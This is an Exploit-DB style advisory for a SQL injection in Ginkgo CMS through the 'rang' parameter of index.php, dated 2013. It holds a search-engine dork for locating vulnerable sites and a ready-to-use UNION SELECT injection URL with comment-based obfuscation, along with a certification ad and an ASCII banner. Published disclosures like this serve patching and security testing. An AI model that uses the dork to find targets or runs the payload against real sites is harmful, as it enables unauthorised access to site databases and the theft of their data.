Ginkgo CMS - 'index.php?rang' SQL Injection

EDB-ID:

27274


Author:

Raw-x

Type:

webapps


Platform:

PHP

Date:

2013-08-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

 __               ___   ________   __                       __           ____    __  __     
/\ \             /\_ \ /\_____  \ /\ \                     /\ \         /\  _`\ /\ \/\ \    
\ \ \      __  __\//\ \\/____//'/'\ \ \___      __      ___\ \ \/'\     \ \ \L\ \ \ \ \ \   
 \ \ \  __/\ \/\ \ \ \ \    //'/'  \ \  _ `\  /'__`\   /'___\ \ , <      \ \ ,  /\ \ \ \ \  
  \ \ \L\ \ \ \_\ \ \_\ \_ //'/'___ \ \ \ \ \/\ \L\.\_/\ \__/\ \ \\`\   __\ \ \\ \\ \ \_\ \ 
   \ \____/\ \____/ /\____\/\_______\\ \_\ \_\ \__/.\_\ \____\\ \_\ \_\/\_\\ \_\ \_\ \_____\
    \/___/  \/___/  \/____/\/_______/ \/_/\/_/\/__/\/_/\/____/ \/_/\/_/\/_/ \/_/\/ /\/_____/

############################################################################################
# Exploit Title   : Ginkgo CMS SQL injection                                               #
# Date            : 31 July 2013                                                           #      
# Exploit Author  : Raw-x                                                                  # 
# Site            : http://www.ginkgo-cms.com/                                             #   
# Tested on       : Linux                                                                  #    
############################################################################################

Dork: 

~~~ inurl:"index.php?rang=" intext:"Ginkgo CMS" ~~~

Examples:

http://server/index.php?rang=5'/**/div/**/0/**/UNION/**/SELECT/**/1,2,3,4,5-- -


############################################################################################
#                       Thanks to:   lulzhack.ru | zentrixplus.net                         #
############################################################################################